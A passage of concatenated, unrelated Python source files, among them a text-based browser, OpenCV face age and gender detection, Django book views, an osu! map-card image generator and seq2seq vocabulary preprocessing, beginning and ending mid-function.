if len(b1_base)<self.n-1:
log.info('Insufficient Equations')
return self.psuedo_halfspace()
# Loop Through Shadow Prices
for i,(h,hd) in enumerate(zip(self.H,self.Hd())):
log.info('Considering '+str(h)+" ~ "+str(hd))
# TODO: We may not want/need this if statement. A basic halfspace still gives information (i.e. it's perpendicular)
A1=np.copy(A1_base)
b1=np.copy(b1_base)
b1[i]+=self._multiplier
b1[-1]+=self._multiplier*hd
try:
newA=lstsq(A1,b1,self.eps)-self.vp
A+=[newA]
b+=[0]
except ValueError:
log.info('LstSq Error.')
# If we can't get enough values to fully determine the system! (This step should only occur when facet duals are 0, which they really shouldn't be)
if len(A)<self.n:
log.info('Insufficient Duals')
return self.psuedo_halfspace()
# Now, solve for the overall solution
try:
log.info('Solving for bounding facet')
nh=Halfspace(self.vexpr,lstsq(A,b,self.eps),self.vp,eps=self.eps,interface=self.interface)
return nh
except ValueError:
# TODO: Could this be orthoganol?
log.error('Could not find the bounding facet.')
return self.psuedo_halfspace()
def psuedo_halfspace(self):
"""Returns a psuedo-halfspace when a true one cannot be obtained
Returns
-------
:class:`fea.Halfspace` object representing a new psuedo-halfspace
"""
return Halfspace(self.vexpr,-self.O,self.vp,real=False,eps=self.eps,interface=self.interface,required=set(self.H))
|
# Load Flat tree package
from IPHCFlatTree.FlatTreeProducer.ConfFile_MINIAOD_cfg import *
# Set max number of events to run on
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.TFileService.fileName = cms.string("FlatTree.root")
# Relval for local tests
process.source.fileNames = cms.untracked.vstring('file:./RelValTTbar_13_CMSSW_7_3_0-MCRUN2_73_V7-v1_MINIAODSIM-file1.root')
|
#!/usr/local/bin/python3.8
'''
name hiding aka shadowing, shows us that even if a variable is assinged a different thing
inside a function, only when the function is called will it's assigned value have meaning.
Otherwise the variable assigned outside of the function will be used.
'''
y = 5
def set_y(y):
print ('Inner y:', y)
set_y(10) # Inner y: 10
print('Outter y:', y) # Outter y: 5 |
# *******************************************************************
# *** Text based browser project of Hyperskill.org ***
# *******************************************************************
#
# Tests require Cachefile to be free of html Tags
# requires modification of function get_page()
#
#
#
import os
import sys
import requests
from bs4 import BeautifulSoup
from colorama import init, Fore
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def filename(url):
# https:// cutoff
if url[0:8] == 'https://':
name = url[8:]
elif url[0:7] == 'http://':
name = url[7:]
else:
name = url
name = name.replace('/', '_',)
# look for '?' and cutoff if found
if '?' in name:
index = 0
for i in range(len(name)):
if name[i] == '?':
index = i
break
name = name[0:index]
return name + '.txt'
def read_cached(name, path):
if os.path.isfile(f'{path}/{name}'):
with open(f'{path}/{name}', encoding='utf-8') as file:
return file.read()
else:
return False
def write_cached(name, path, webpage):
with open(f'{path}/{name}', 'w', encoding='utf-8') as file:
for line in webpage:
file.write(f"{line}")
def output(parts):
for tag in parts:
# Nestet Tags? => call recursion with new list items
try:
new = list(tag.children)
if len(new) > 1:
output(list(tag.children))
continue
except:
pass
# No nested Tags? Proceed
if isinstance(tag, str):
print(tag, end='')
elif tag.name == 'a':
print(Fore.BLUE + tag.get_text() + Fore.BLACK, end='')
elif tag.name == 'title':
print(Color.BOLD + tag.get_text() + Color.END)
elif tag.name == 'span':
print(tag.get_text())
elif tag.name == 'strong':
print(Color.BOLD + tag.get_text() + Color.END, end='')
elif tag.name == 'p':
print(tag.get_text())
elif tag.name == 'br':
pass
elif tag.name is None:
pass
else:
pass
def scrape(webpage):
soup = BeautifulSoup(webpage, 'html.parser')
output(soup.title)
paragf = soup.find_all('p')
for line in paragf:
parts = list(line.children)
output(parts)
def get_page(url, path):
name = filename(url)
cached = read_cached(name, path)
if not cached:
# body = []
tab = requests.get(url)
if 200 <= tab.status_code < 400:
# soup = BeautifulSoup(tab.content, 'html.parser')
# body.append(soup.title)
# output(soup.title)
# paragf = soup.find_all('p')
# for line in paragf:
# body.append(line.get_text())
# parts = list(line.children)
# output(parts)
#write_cached(name, path, body)
write_cached(name, path, tab.text) #Remove 4 test
scrape(tab.content) # Remove 4 test
else:
print(f'Error:{tab.status_code}')
else:
scrape(cached)
#########################################
### Program starts here #################
#########################################
init()
args = sys.argv
if len(args) >= 2:
dir_name = args[1]
else:
dir_name = 'resources'
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
history = []
command = input()
if command == '':
command = 'doc.python.org'
while command != "exit":
page = command
if '.' not in page:
print('error : Incorrect URL')
elif page[0:4] != 'http':
page = 'https://' + command
get_page(page, dir_name)
else:
page = command
get_page(page, dir_name)
# Next command = 'back' ?
command = input()
if command == 'back':
if len(history) > 0:
command = history.pop()
else:
command = 'exit'
else:
history.append(page)
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
img=cv2.imread("camera.png")
cv2.imshow("Camera",img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
import unittest
from katas.kyu_7.unlimited_sum import sum
class UnlimitedSumTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(sum(1, 2, 3), 6)
def test_equals_2(self):
self.assertEqual(sum('1', 1, '2', 2), 3)
|
from nose.tools import *
def test_message_storage_consistency():
from espresso.user import User
from espresso.message import Message
FAKE_USER = User("f00f", "jimmy depreaux")
FAKE_MESSAGE_TEXT = "watch out for traffic!"
FAKE_CHANNEL = "safety-warnings"
a_message = Message(FAKE_USER,
FAKE_CHANNEL,
FAKE_MESSAGE_TEXT)
assert a_message.user is FAKE_USER
assert a_message.text == FAKE_MESSAGE_TEXT
assert a_message.channel == FAKE_CHANNEL
def test_message_matching():
from espresso.user import User
from espresso.message import Message
FAKE_USER = User("f00f", "jimmy depreaux")
FAKE_MESSAGE_TEXT = "watch out for traffic!"
FAKE_CHANNEL = "safety-warnings"
a_message = Message(FAKE_USER,
FAKE_CHANNEL,
FAKE_MESSAGE_TEXT)
assert a_message.match("asdfasdf") is None
assert a_message.match("watch out") is not None |
# Age and Gender detection of a person based on the image by passing it to the machine learning algorithm
# importing required modules
import cv2 as cv
# import time
# extracting face of the person from image
def extract_face(net, image, conf_threshold=0.7):
frame = image.copy()
f_height = frame.shape[0] # frame height
f_width = frame.shape[1] # frame width
# deep neural network library
# blobfromimage method to set scalefactor, size, mean, swapRB, crop, ddepth of the image
blob_img = cv.dnn.blobFromImage(frame, 1.0, (300, 300), [104, 117, 123], True, False)
net.setInput(blob_img)
detections = net.forward()
b_boxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * f_width)
y1 = int(detections[0, 0, i, 4] * f_height)
x2 = int(detections[0, 0, i, 5] * f_width)
y2 = int(detections[0, 0, i, 6] * f_height)
b_boxes.append([x1, y1, x2, y2])
cv.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), int(round(f_height / 150)), 8)
return frame, b_boxes
face_Proto = "models/opencv_face_detector.pbtxt" # protocol buffer
face_Model = "models/opencv_face_detector_uint8.pb"
age_Proto = "models/age_deploy.prototxt" # deploys age model
age_Model = "models/age_net.caffemodel" # defines the the internal states of layer parameters
gender_Proto = "models/gender_deploy.prototxt" # deploys gender model
gender_Model = "models/gender_net.caffemodel" # defines the the internal states of layer parameters
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
# set age and gender category
age_category = ['(0-3)', '(4-7)', '(8-15)', '(16-23)', '(24-33)', '(34-45)', '(46-54)', '(55-100)']
gender_category = ['Male', 'Female']
# loading the network - face, age and gender network
face_network = cv.dnn.readNet(face_Model, face_Proto)
age_network = cv.dnn.readNet(age_Model, age_Proto)
gender_network = cv.dnn.readNet(gender_Model, gender_Proto)
padding = 20
# age and gender detection of the person based on the image
def age_gender_detector(image):
# reading image
# t = time.time()
frame_face, b_boxes = extract_face(face_network, image)
for bbox in b_boxes:
face = image[max(0, bbox[1] - padding):min(bbox[3] + padding, image.shape[0] - 1),
max(0, bbox[0] - padding):min(bbox[2] + padding, image.shape[1] - 1)]
blob = cv.dnn.blobFromImage(face, 1.0, (227, 227), MODEL_MEAN_VALUES, swapRB=False)
gender_network.setInput(blob)
gender_pred = gender_network.forward()
gender = gender_category[gender_pred[0].argmax()]
# Display detected gender of the input image on to console
print("Gender Output: {}, conf = {:f}".format(gender, gender_pred[0].max()))
age_network.setInput(blob)
age_pred = age_network.forward()
age = age_category[age_pred[0].argmax()]
# Display detected age of the input image on to console
print("Age Output : {}".format(age_pred))
print("Age : {}, conf = {:f}".format(age, age_pred[0].max()))
frame_label = "{},{}".format(age, gender)
font = cv.FONT_ITALIC
color = (0, 0, 255)
# putText renders the specified text string in the image
cv.putText(frame_face, frame_label, (bbox[0], bbox[1] - 10), font, 0.8, color, 2,
cv.FILLED)
return frame_face
# displaying the output image along with age and gender indication
input_image = cv.imread("rh.PNG")
output_image = age_gender_detector(input_image)
cv.imshow("image", output_image)
cv.waitKey(0) |
from menus import PagedMenu, PagedOption, Text
from filters.players import PlayerIter
from admin.commands.punishment import Punishment
from ..strings import menus
from .playercommands import PlayerCommandsMenu
__all__ = (
'SlayPlayer'
)
class SlayPlayer(PlayerCommandsMenu):
"""Menu used to kick players"""
caption = menus['Slay Menu']
needed_flag = 'admin.slay'
@staticmethod
def select(menu, index, choice):
"""Slay player"""
Punishment.slay(choice.value, owner=index)
return menu
@staticmethod
def build(menu, index):
"""List players"""
menu.clear()
for player in PlayerIter():
menu.append(PagedOption(player.name, player))
@classmethod
def menu(cls):
"""Return the menu object"""
return PagedMenu(
title=cls.caption,
build_callback=cls.build,
select_callback=cls.select
)
|
# 使用拓展
import json
import os
import requests
from wand.drawing import Drawing
from wand.image import Image
# 参数部分
key = '' # ppy的apikey,若没有请转到 https://osu.ppy.sh/p/api 申请一个。
# ppy request 部分。
def ppyrequest(apikey: str, beatmaps_id: str, pool: str, name: str):
url = 'https://osu.ppy.sh/api/get_beatmaps?k=' + apikey + '&b=' + beatmaps_id
r = requests.get(url)
hjson = json.loads(r.text)
artist = hjson[0]['artist_unicode']
title = hjson[0]['title_unicode']
artist2 = hjson[0]['artist']
title2 = hjson[0]['title']
try:
len(artist)
except:
artist = hjson[0]['artist']
try:
len(title)
except:
title = hjson[0]['title']
if hjson[0]['title_unicode'] is not None and len(title) > 12:
if title == title2:
if len(title) >= 22:
title = title[:22] + '...'
else:
title = title[:12] + '...'
else:
if len(title) >= 22:
title = title[:22] + '...'
if hjson[0]['artist_unicode'] is not None and len(artist) > 8:
if artist == artist2:
if len(artist) >= 14:
artist = artist[:14] + '...'
else:
artist = artist[:8] + '...'
else:
if len(artist) >= 14:
artist = artist[:14] + '...'
output = artist + ' - ' + title
diffname = hjson[0]['version']
beatmapset_id = hjson[0]['beatmapset_id']
loadimage(beatmapset_id, output, diffname, pool, name)
# 从ppy api中下载封面图到本地。
def loadimage(beatmapset_id: str, title: str, diffname: str, pool: str, name: str):
url = 'https://assets.ppy.sh/beatmaps/' + beatmapset_id + '/covers/cover.jpg'
img = requests.get(url)
ex = open('export.jpg', 'ab')
ex.write(img.content)
ex.close()
imageprocess(title, diffname, pool, name)
# magick裁剪图片。
def imageprocess(title: str, diffname: str, pool: str, name: str):
with Image(filename='export.jpg')as img:
img.crop(0, 0, 514, 74)
img.save(filename='export.png')
os.remove('export.jpg')
imagecomposite(title, diffname, pool, name)
# magick处理图片内容。
def imagecomposite(title: str, diffname: str, pool: str, name: str):
out = Image(width=550, height=110)
bg = Image(filename='export.png')
r = Image(filename='frame.png')
icon = Image(filename='image/' + pool + '.png')
with Drawing() as draw:
draw.composite(operator='undefined', left=18, top=18, width=bg.width, height=bg.height, image=bg)
draw.composite(operator='darken', left=0, top=0, width=r.width, height=r.height, image=r)
draw.font = 'font.ttf'
draw.font_size = 24
draw.fill_color = 'white'
draw.text(34, 52, title)
draw.font_size = 20
draw.fill_color = 'white'
draw.text(34, 76, diffname)
draw.composite(operator='atop', left=436, top=59, width=92, height=28, image=icon)
draw(out)
out.save(filename='export/' + name + '.png')
os.remove('export.png')
# 文本读入。
def contenttolist():
f = open('list.txt')
g = f.read()
check = g.split('\n')
for i in range(0, len(check), 1):
content = check[i]
sep = content.split(',')
bid = sep[0]
pool = sep[1]
ppyrequest(key, bid, pool, name=str(i))
# 从此处开始执行,顺序由上往下。
contenttolist()
|
"""
This file defines a number of convenience functions which make it
easier to work interactively with the DREAM Python interface.
"""
from .DREAMOutput import DREAMOutput
from .DREAMException import DREAMException
# Declare global variables
_wholist = []
def setup_interactive(do, glob):
"""
Sets up an interactive session by defining all unknowns as
global variables and assigning to them from the given
DREAM output. 'do' may be either a 'DREAMOutput' object, or
a string giving the name of the DREAM output to load.
do: DREAMOutput object or name of file to load.
glob: Global environment seen by the caller (this should
literally be 'globals()')
"""
global _wholist
if type(do) == str:
do = DREAMOutput(do)
elif not isinstance(do, DREAMOutput):
raise DREAMException("Unrecognized type of input parameter. Type: {}".format(type(do)))
_wholist = list(do.eqsys.keys())
# Declare unknowns
for uqn in do.eqsys.keys():
glob[uqn] = do.eqsys[uqn]
# Declare other useful stuff
glob['grid'] = do.grid
glob['other'] = do.other
glob['solver'] = do.solver
print('Loaded {} unknowns ({})'.format(len(do.eqsys.keys()), do.getFileSize_s()))
print(do.grid)
who()
def who():
"""
Print a list of variables defined in the loaded DREAMOutput object.
"""
global _wholist
print('Unknowns:')
_wholist.sort(key=str.casefold)
for i in range(0, len(_wholist)):
if i == 0:
print(' {}'.format(_wholist[i]), end="")
else:
print(', {}'.format(_wholist[i]), end="")
print("")
|
# Internet Access
from urllib.request import urlopen
with urlopen('http://tycho.usno.navy.mil/cgi-bin/timer.pl') as response:
for line in response:
line = line.decode('utf-8') # shouldn't they be utf-8 encoding in memory? What's the binary data
if 'EST' in line or 'EDT' in line:
print(line)
import smtplib
server = smtplib.SMTP('localhost')
server.sendmail('soothsayer@example.ort', 'jcaesar@example.ort',
"""To: jcaesar@example.org
From: soothsayer@example.org
Beware the Ides of March
""")
server.quit()
|
# To ignore the warnings
import warnings
warnings.filterwarnings('ignore')
# importing necessory libraries
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score
# matplotlib is for visualization purpose
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams['figure.figsize'] = 10,6
from sklearn.feature_extraction.text import CountVectorizer
messages = ['call you tonight', 'Call me a cab', 'please call me.. please']
# instantiate CountVectorizer (vectorizer)
vect = CountVectorizer()
vect.fit(messages)
vect.get_feature_names()
messages_transformed = vect.transform(messages)
print(messages)
print(vect.get_feature_names())
messages_transformed.toarray()
data = pd.DataFrame(messages_transformed.toarray())
data.columns = vect.get_feature_names()
print(messages)
data.head()
data.loc[0,'outcome'] ='info'
data.loc[1,'outcome'] ='order'
data.loc[2,'outcome'] = "request"
data.head()
|
from django.db import models
# Create your models here.
class Partner(models.Model):
full_name = models.CharField(max_length=255)
photo = models.ImageField(upload_to='partner/')
def str(self):
return self.full_name
class Category(models.Model):
name = models.CharField(max_length=255)
def str(self):
return self.name
class SocialNetwork(models.Model):
YOUTUBE = "YOUTUBE"
TIKTOK = "TIKTOK"
INSTAGRAM = "INSTAGRAM"
TELEGRAM = "TELEGRAM"
SOCIAL_NETWORK_CHOUCES = (
(TELEGRAM, TELEGRAM),
(TIKTOK, TIKTOK),
(INSTAGRAM, INSTAGRAM),
(YOUTUBE, YOUTUBE),
)
sub_count = models.IntegerField(default=0)
url = models.URLField()
name = models.CharField(choices=SOCIAL_NETWORK_CHOUCES, max_length=100)
price = models.CharField(max_length=100)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True)
partner = models.ForeignKey(Partner, on_delete=models.CASCADE)
def str(self):
return f"{self.name}|{self.partner.full_name}" |
print(1+2)
a=10
b=a+10
c=b+10
print(c)
a=1
b=3
c=4
d=2**2+a+b//2*c
f=d%2
print(f)
print(b+a)
print(a*b)
print("3月19日的作业")
name=input("请输入名字>>>")
age=input("请输入小明今年的年龄>>>")
a=int(age)
age1=a+1
b=type(a)
age2=str(age1)
print(b)
#name加双引号
print('我的名字是“'+name+'”,明年的年龄是'+age2+'岁了')
|
from django.urls import reverse_lazy
# Create your views here.
from django.views.generic.edit import CreateView,UpdateView,DeleteView
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from .models import Book
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.auth.mixins import LoginRequiredMixin
class BookDetail(LoginRequiredMixin,DetailView):
model = Book
template_name = "book_detail.html"
slug_field = 'isbn'
login_url = '/accounts/login/'
#success_url = '/success/'
#success_message = "%(name)s was created successfully"
class BookCreate(LoginRequiredMixin,SuccessMessageMixin,CreateView):
model = Book
fields = ['name','isbn']
print(fields)
print(type(fields))
login_url = '/accounts/login/'
success_url = reverse_lazy('book_list')
#entry_list = list(Book.objects.all()
message = "%(name)s was created sucessfully"
success_message = message
#messages.success(message,'Your password was updated successfully!')
class BookList(LoginRequiredMixin,ListView):
model = Book
template_name = "book_list.html"
login_url = '/accounts/login/'
class BookUpdate(LoginRequiredMixin,UpdateView):
model = Book
slug_field = 'isbn'
fields = ['name','isbn']
template_name_suffix = '_update_form'
success_url = reverse_lazy('book_list')
login_url = '/accounts/login/'
class BookDelete(LoginRequiredMixin,DeleteView):
model = Book
slug_field = 'isbn'
success_url = reverse_lazy('book_list')
login_url = '/accounts/login/'
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
def print_ans(val):
alert = val.switch_to.alert
print(alert.text.split()[-1])
alert.accept()
try:
browser = webdriver.Chrome()
browser.get('http://suninjuly.github.io/selects1.html')
summ = str(int(browser.find_element_by_id('num1').text) + int(browser.find_element_by_id('num2').text))
select = Select(browser.find_element_by_id("dropdown"))
select.select_by_value(summ)
browser.find_element_by_css_selector('button.btn').click()
finally:
print_ans(browser)
browser.quit()
|
import unittest
from katas.kyu_8.powers_of_2 import powers_of_two
class PowersOfTwoTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(powers_of_two(0), [1])
def test_equal_2(self):
self.assertEqual(powers_of_two(1), [1, 2])
def test_equal_3(self):
self.assertEqual(powers_of_two(4), [1, 2, 4, 8, 16])
|
from numpy import *
import adaboost
'''
datMat,classLabels=adaboost.loadSimpData()
#print(datMat[:,0])
#print( ones((shape(datMat)[0],1)))
D=mat(ones((5,1))/5)
#print(D)
#print(adaboost.buildStump(datMat,classLabels,D))
#adaboost.buildStump(datMat,classLabels,D)
classifierArray,kk=adaboost.adaBoostTrainDS(datMat,classLabels,44)
print(classifierArray)
#adaboost.addrin()
ans=adaboost.adaClassify(datMat,classifierArray)
#print(ans)
'''
datArr,labelArr=adaboost.loadDataSet('horseColicTraining2.txt')
classifierArray,aggClassEst=adaboost.adaBoostTrainDS(datArr,labelArr,40)
#print(classifierArray)
#print(aggClassEst[0:10])
#print(shape(aggClassEst.T))
#sortedIndicies = aggClassEst.T.argsort()
#print(shape(sortedIndicies))
#print(sortedIndicies[0,:10])
#print(sortedIndicies[0])
#print(len(classifierArray))
#adaboost.plotROC(aggClassEst.T,labelArr)
##利用测试集作检测
datatest,labeltest=adaboost.loadDataSet('horseColicTest2.txt')
pre=adaboost.adaClassify(datatest,classifierArray)
s=0
wrong=0
for i in range(len(pre)):
s+=1
if pre[i]!=labeltest[i]:
wrong+=1
print(wrong/s)
|
def intersect(seq1, seq2):
res = [] # Start empty
for x in seq1: # scan the list
if x in seq2: # common sequence
res.append(x) # append the item
return res;
s1 = 'spam'
s2 = 'scam'
value = intersect(s1, s2)
print(value)
|
import itertools
import json
from collections import Counter
from nltk import tokenize
from tensorflow.python.platform import gfile
import re
import os
import numpy as np
from nltk import tokenize as nltk_tokenizor
from spacy.en import English
parser = English()
# Special vocabulary symbols - we always put them at the start.
_PAD = b"_PAD"
_GO = b"_GO"
_EOS = b"_EOS"
_UNK = b"_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
_OOV = b"_OOV"
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def load_article(raw_path, early_stop, batch_size):
'''
:param raw_path:
:param early_stop:
:param batch_size:
:return: yeild tokenized batch of articles
'''
article_index = 0
sample_file = open(raw_path)
if early_stop:
with open(raw_path) as f:
for next_n_lines in itertools.izip_longest(*[f] * batch_size):
articles = {"title": [], "content": []}
for line in next_n_lines:
if line:
json_data = json.loads(line.strip())
articles["title"].append(json_data['title'])
articles["content"].append(json_data['content'])
early_stop -= 1
if early_stop <= 0:
break
tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
# print("len(tok_articles['content']", len(tok_articles['content']))
yield tok_articles
if early_stop <= 0:
break
else:
with open(raw_path) as f:
for next_n_lines in itertools.izip_longest(*[f] * batch_size):
articles = {"title": [], "content": []}
for line in next_n_lines:
if line:
json_data = json.loads(line.strip())
articles["title"].append(json_data['title'])
articles["content"].append(json_data['content'])
tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
yield tok_articles
import unicodedata
# def create_text_data(raw_path, content_path, title_path):
# with gfile.GFile(raw_path, mode="rb") as raw:
# with gfile.GFile(content_path, mode="wb") as content_file:
# with gfile.GFile(title_path, mode="wb") as title_file:
#
# for i, line in enumerate(raw):
# if i > 0:
# break
#
# if line:
# json_data = json.loads(line.strip())
# # print("create_text_data: "+json_data['title'])
#
# decoded = unicodedata.normalize('NFKD', json_data['content']).encode('ASCII', 'ignore')
# content_list = decoded.split("\n")
# print(json_data['content'].split("\n"))
# print(content_list)
# content_line = " ".join(nltk_tokenizor.sent_tokenize("".join(content_list)))
# decoded = unicodedata.normalize('NFKD', json_data['title']).encode('ASCII', 'ignore')
# title_line = "".join(decoded.split("\n"))
# title_file.write(title_line + b"\n")
# content_file.write(content_line + b"\n")
def create_text_data(raw_path, content_path, title_path, sentence_truncate=None, tokenizer=None, normalize_digits=False):
print("start create_text_data...")
counter = 0
with gfile.GFile(raw_path, mode="rb") as raw:
with gfile.GFile(content_path, mode="wb") as content_file:
with gfile.GFile(title_path, mode="wb") as title_file:
for i, line in enumerate(raw):
# if i >= 100:
# break
counter += 1
if counter % 100000 == 0:
print("Create vocab: processing line %d" % counter)
json_data = json.loads(line.strip())
for sentence, file in zip((json_data['title'], json_data['content']),(title_file, content_file)):
if sentence_truncate:
# sentence = "".join("".join(sentence.split("\n")).split("\r"))
sentence = ''.join(sentence.splitlines())
sentence = truncate_article(sentence, sentence_truncate)
else:
sentence = ''.join(sentence.splitlines())
# sentence = "".join("".join(sentence.split("\n")).split("\r"))
tokens = tokenizer(sentence) if tokenizer else basic_tokenizer(sentence)
if normalize_digits:
tokens = [re.sub(_DIGIT_RE, b"0", w) for w in tokens]
output = " ".join(tokens)+ b"\n"
file.write(output.encode("utf8"))
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(re.split(_WORD_SPLIT, space_separated_fragment))
return [w.lower() for w in words if w]
def spacy_tokenizer(sentence):
parsedData = parser(sentence)
return [word.orth_.lower() for word in parsedData]
def truncate_article(article_content, sentence_num):
if not isinstance(article_content, unicode):
article_content = article_content.decode("utf8")
parsedData = parser(article_content)
sents = []
for span in parsedData.sents:
# go from the start to the end of each span, returning each token in the sentence
# combine each token using join()
sent = ''.join(parsedData[i].string for i in range(span.start, span.end)).strip()
sents.append(sent)
return " ".join(sents[:sentence_num])
def get_vocab_counter(json_file_path, sentence_truncate=None, tokenizer=None, normalize_digits=True):
counter = 0
vocab = Counter()
with gfile.GFile(json_file_path, mode="rb") as f:
for line in f:
counter += 1
if counter % 100000 == 0:
print("Create vocab: processing line %d" % counter)
json_data = json.loads(line.strip())
for sentence in (json_data['title'], json_data['content']):
if sentence_truncate:
sentence = truncate_article(sentence, sentence_truncate)
tokens = tokenizer(sentence) if tokenizer else basic_tokenizer(sentence)
if normalize_digits:
tokens = [re.sub(_DIGIT_RE, b"0", w) for w in tokens]
for token in tokens:
vocab[token] += 1
return vocab
# modified
def create_vocabulary(vocabulary_path, train_json_path, evl_json_path,
max_vocabulary_size, oov_size, sentence_truncate=None, tokenizer=None, normalize_digits=True):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
data_path: data file that will be used to create vocabulary.
max_vocabulary_size: limit on the size of the created vocabulary.
oov_size: oov_size out of vocabulary, it is used for keeping unknown words in the inputs
sentence_truncate: number of sentence selected from the begining of the article
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
if not gfile.Exists(vocabulary_path):
print("Creating vocabulary %s" % (vocabulary_path))
vocabcount = Counter()
vocabcount += get_vocab_counter(train_json_path, sentence_truncate=sentence_truncate, tokenizer=None, normalize_digits=True)
vocabcount += get_vocab_counter(evl_json_path, sentence_truncate=sentence_truncate, tokenizer=None, normalize_digits=True)
vocab = map(lambda x: x[0], sorted(vocabcount.items(), key=lambda x: -x[1]))
vocab_list = _START_VOCAB + vocab
if len(vocab_list) > max_vocabulary_size:
vocab_list = vocab_list[:max_vocabulary_size-oov_size]
for i in xrange(oov_size):
oov_word = _OOV+"{}".format(i)
vocab_list.append(oov_word)
with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
for w in vocab_list:
vocab_file.write(w.encode('utf8') + b"\n")
def sentence_to_token_ids(sentence, vocabulary, oov_size, tokenizer=None, normalize_digits=True):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
oov_size: oov_size out of vocabulary, it is used for keeping unknown words in the inputs
tokenizer: a function to use to tokenize each sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
Returns:
a list of integers, the token-ids for the sentence.
"""
if tokenizer:
words = tokenizer(sentence)
else:
words = basic_tokenizer(sentence)
print(words)
# todo assigned unknown words to placeholders
if oov_size > 0:
sentence_ids = []
unknown_to_placeholders = {}
current_oov_index = 0
for w in words:
if normalize_digits:
w = re.sub(_DIGIT_RE, b"0", w)
if w not in vocabulary.keys():
# For the same unkonwn words, use the same placeholders
if w in unknown_to_placeholders.keys():
sentence_ids.append(unknown_to_placeholders[w])
# For a new unknown word, assign a new placeholder
elif current_oov_index < oov_size:
newplaceholder = _OOV+"{}".format(current_oov_index)
id = vocabulary.get(newplaceholder, UNK_ID)
unknown_to_placeholders[newplaceholder] = id
sentence_ids.append(id)
current_oov_index += 1
# For a new unknown word and no more free placeholder, assign the word id to UNK_ID
else:
sentence_ids.append(UNK_ID)
else:
sentence_ids.append(vocabulary[w])
return sentence_ids
else:
if not normalize_digits:
return [vocabulary.get(w, UNK_ID) for w in words]
# Normalize digits by 0 before looking words up in the vocabulary.
return [vocabulary.get(re.sub(_DIGIT_RE, b"0", w), UNK_ID) for w in words]
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="rb") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
def data_to_token_ids(json_data_path, title_path, content_path, vocabulary_path, oov_size, sentence_truncate=None,
tokenizer=None, normalize_digits=True):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
tokenizer: a function to use to tokenize each sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
if not gfile.Exists(title_path):
print("Tokenizing data in %s" % json_data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(json_data_path, mode="rb") as data_file:
with gfile.GFile(title_path, mode="wb") as title_file:
with gfile.GFile(content_path, mode="wb") as content_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(" tokenizing line %d" % counter)
json_data = json.loads(line.strip())
for sentence, file in zip([json_data['title'].encode("utf8"), json_data['content'].encode("utf8")],[title_file, content_file]) :
if sentence_truncate:
sentence = truncate_article(sentence, sentence_truncate)
token_ids = sentence_to_token_ids(sentence, vocab, oov_size, tokenizer,
